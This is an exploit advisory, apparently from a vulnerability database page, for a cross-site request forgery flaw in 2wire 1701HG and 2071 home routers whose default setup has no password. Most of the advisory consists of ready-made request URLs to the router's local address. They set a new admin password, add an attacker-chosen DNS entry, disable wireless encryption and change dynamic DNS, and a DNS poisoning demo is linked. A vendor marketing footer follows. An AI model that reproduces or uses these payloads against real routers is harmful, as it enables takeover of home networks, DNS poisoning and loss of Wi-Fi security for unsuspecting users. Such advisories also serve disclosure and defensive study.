`Cross Site Request Forgery in 2wire routers
Vulnerable Routers: 1701HG, 2071 Gateway
Software: v3.17.5, 5.29.51 Password Not Set (default)
Greetz a la Comunidad Underground de México, y a los
que me ayudaron a probarlo: Preth00nker, nitr0us, ...
[email protected]
I. Background
-------------
This is the most popular router in Mexico and the default installation from the ISP has no system password.
II. Vuln
----------------
It is possible to send a request to the router that will modify its configuration.
It does not validate POST, or Referer or Anything...
II. Exploit
----------------
We just need the client to do a request to the router with the configuration we desire.
[examples]
Set a password (NUEVOPASS):
http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_CONF=NUEVOPASS
Add names to the DNS (216.163.137.3 www.prueba.hkm):
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.prueba.hkm&ADDR=216.163.137.3
Disable Wireless Authentication
http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0
Set Dynamic DNS
http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE
Disable the Firewall
Reset the device
Etc...
DNS Poisoning demo: http://www.hakim.ws/2wire/demodns.html
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation